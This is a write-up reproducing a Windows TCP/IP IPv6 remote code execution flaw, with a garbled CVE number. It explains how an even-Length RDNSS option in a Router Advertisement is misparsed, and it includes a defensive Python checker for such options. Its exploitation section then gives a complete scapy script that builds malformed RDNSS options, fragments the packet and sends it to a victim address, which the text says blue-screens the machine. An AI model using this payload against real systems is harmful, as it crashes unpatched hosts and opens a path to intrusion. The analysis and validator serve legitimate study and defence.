
CVE--16838 Windows TCP/IP remote code execution vulnerability reproduction

Date: 2024-03-07 15:14:14


Vulnerability environment

Attacker machine: Windows 10

(Python version: 3.7, with the scapy dependency installed)

Victim machine: Windows 10 1909

The victim's network has IPv6 support enabled.

Open cmd and run ipconfig; the victim's IPv6 address is

fd15:4ba5:5a2b:1008:8c9a:8a2b:4489:74aa

The attacker's IPv6 address is

fe80::9835:b7ba:c813:5f6a%10

The attacker and the victim must be able to reach each other on the network.

Vulnerability analysis

According to RFC 5006, the Length field of an RDNSS option must be odd. When an attacker constructs an RDNSS option whose Length is even, Windows TCP/IP, while checking the packet, uses each option's Length to compute the offset of the next option and walks the options that way. The boundaries of the Address of IPv6 Recursive DNS Servers field and of the following RDNSS option are therefore parsed incorrectly, validation is bypassed, and the attacker's forged option is parsed, causing a stack overflow that crashes the system.
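The defensive counterpart of the analysis above is to validate the RDNSS Length field before any address is read from the option. The following is an added example, not code from the original post: a pure-Python walker over the option chain of an ICMPv6 Router Advertisement that applies the RFC 5006 (now RFC 8106) rule (Length must be odd and at least 3, i.e. 1 + 2 * number of addresses) and also rejects a chain whose declared lengths run past the end of the buffer. The constant names, the Finding class and the sample option bytes are constructed for this example; the addresses come from the 2001:db8::/32 documentation prefix.

```python
"""Added example: validate RDNSS (type 25) options in a Router Advertisement
option chain the way RFC 8106 requires, flagging malformed Length fields
before any server address is parsed. Standard library only; no scapy."""
import ipaddress
import struct
from dataclasses import dataclass
from typing import Iterator, List, Optional, Tuple

ND_OPT_RDNSS = 25  # RDNSS option type (RFC 8106); constant name chosen for this example
ND_OPT_MTU = 5     # MTU option type (RFC 4861); used only as a well-formed neighbour


@dataclass
class Finding:
    offset: int        # byte offset of the option inside the option chain (-1: chain unusable)
    opt_type: int
    length_units: int  # the option's Length field, in 8-octet units
    reason: str


def build_rdnss(addresses: List[str], lifetime: int = 3600,
                length_override: Optional[int] = None) -> bytes:
    """Serialise one RDNSS option. length_override lets the demo build a
    non-compliant option; the body is padded or cut so that the bytes on the
    wire match the declared Length and the chain stays walkable."""
    body = b"\x00\x00" + struct.pack("!I", lifetime)          # Reserved + Lifetime
    body += b"".join(ipaddress.IPv6Address(a).packed for a in addresses)
    length = length_override if length_override is not None else 1 + 2 * len(addresses)
    wire = length * 8
    return (bytes([ND_OPT_RDNSS, length]) + body)[:wire].ljust(wire, b"\x00")


def walk_nd_options(options: bytes) -> Iterator[Tuple[int, int, int, bytes]]:
    """Yield (offset, type, length, body) for each ND option. Raise on a chain
    that cannot be walked: RFC 4861 forbids Length 0 and truncated options."""
    off = 0
    while off < len(options):
        if len(options) - off < 2:
            raise ValueError(f"trailing {len(options) - off} byte(s) at offset {off}")
        opt_type, length = options[off], options[off + 1]
        if length == 0:
            raise ValueError(f"option at offset {off} has Length 0")
        end = off + length * 8
        if end > len(options):
            raise ValueError(f"option at offset {off} declares {length * 8} bytes, "
                             f"only {len(options) - off} present")
        yield off, opt_type, length, options[off + 2:end]
        off = end


def check_rdnss_options(options: bytes) -> List[Finding]:
    """Return one Finding per RDNSS option that violates the Length rule,
    or a single offset -1 Finding when the chain itself is malformed."""
    findings: List[Finding] = []
    try:
        for off, opt_type, length, body in walk_nd_options(options):
            if opt_type != ND_OPT_RDNSS:
                continue
            if length < 3:
                findings.append(Finding(off, opt_type, length,
                                        "Length below the RFC 8106 minimum of 3"))
            elif length % 2 == 0:
                addr_bytes = len(body) - 6  # body minus Reserved (2) and Lifetime (4)
                findings.append(Finding(off, opt_type, length,
                                        f"even Length: {addr_bytes}-byte address region "
                                        f"is not a multiple of 16"))
    except ValueError as exc:
        findings.append(Finding(-1, 0, 0, f"malformed option chain: {exc}"))
    return findings


def parse_rdnss_addresses(body: bytes) -> List[str]:
    """Extract the server addresses from an RDNSS body that passed the check."""
    region = body[6:]
    return [str(ipaddress.IPv6Address(region[i:i + 16])) for i in range(0, len(region), 16)]


# Constructed sample data for the demo (not captured traffic).
MTU_OPTION = bytes([ND_OPT_MTU, 1, 0, 0]) + struct.pack("!I", 1500)
VALID_OPTIONS = MTU_OPTION + build_rdnss(["2001:db8::53", "2001:db8::54"])           # Length 5
EVEN_LENGTH_OPTIONS = MTU_OPTION + build_rdnss(["2001:db8::53"], length_override=4)  # Length 4
TRUNCATED_OPTIONS = VALID_OPTIONS[:-8]                                               # last 8 bytes missing

if __name__ == "__main__":
    for name, blob in [("valid", VALID_OPTIONS), ("even length", EVEN_LENGTH_OPTIONS),
                       ("truncated", TRUNCATED_OPTIONS)]:
        print(name, check_rdnss_options(blob) or "ok")
```

The check is deliberately done on the Length field alone, before touching the address region: a parser that first walks addresses and only then reconciles them with Length is exactly the ordering the analysis above describes as exploitable. The same walker can be run over RA option bytes pulled from a capture to look for even-length RDNSS options on a monitored segment.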

Exploitation

Payload:

from scapy.all import *
from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6

v6_dst = "fd15:4ba5:5a2b:1008:109f:9a46:8d19:f103"
v6_src = "fe80::501a:49b7:b7d:5362%12"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA()

# RDNSS option whose declared length does not match its address list
e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
    "AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
]

# RDNSS option with an even length (8), the condition described in the analysis
aaa = ICMPv6NDOptRDNSS()
aaa.len = 8

pkt = ICMPv6ND_RA() / aaa / \
    Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

# Wrap in IPv6 with a Fragment header and send as fragments
p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255) / \
    IPv6ExtHdrFragment() / pkt

l = fragment6(p_test_frag, 200)
for p in l:
    send(p)

Constructing this IPv6 packet and sending it to the victim machine causes it to blue-screen.

Reference: https://mp./s?__biz=MzI0NzEwOTM0MA==&mid=2652485147&idx=1&sn=384b9655137bf0f1fa1e08f8221d25df&chksm=f25815a8c52f9cbe41ba99a559912fd8eed5280edd8bcde12a6e0f3b52484203ed44124fc16c&mpshare=1&scene=23&srcid=1117oZTZtZ441K2KodFkILk4&sharer_sharetime=1605620438301&sharer_shareid=a9146a5cec9e0abd7cba45f1a31897fd#rd
